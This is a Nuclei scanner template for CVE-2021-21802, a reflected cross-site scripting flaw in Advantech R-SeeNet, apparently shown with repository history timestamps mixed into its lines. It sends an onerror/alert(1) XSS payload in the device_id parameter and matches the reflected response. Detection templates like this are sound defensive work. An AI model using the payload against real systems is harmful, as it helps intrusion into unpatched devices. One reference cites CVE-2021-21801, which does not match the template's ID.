nuclei-templates/http/cves/2021/CVE-2021-21802.yaml

49 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2021-21802
info:
name: Advantech R-SeeNet - Cross-Site Scripting
author: gy741
severity: medium
description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
- https://nvd.nist.gov/vuln/detail/CVE-2021-21801
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-21802
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.83742
epss-percentile: 0.98074
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: advantech
product: r-seenet
tags: cve,cve2021,rseenet,xss
http:
- method: GET
path:
- '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22'
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
words:
- '"zlo onerror=alert(1) "'
2021-07-18 17:44:19 +00:00
- 'Device Status Graph'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200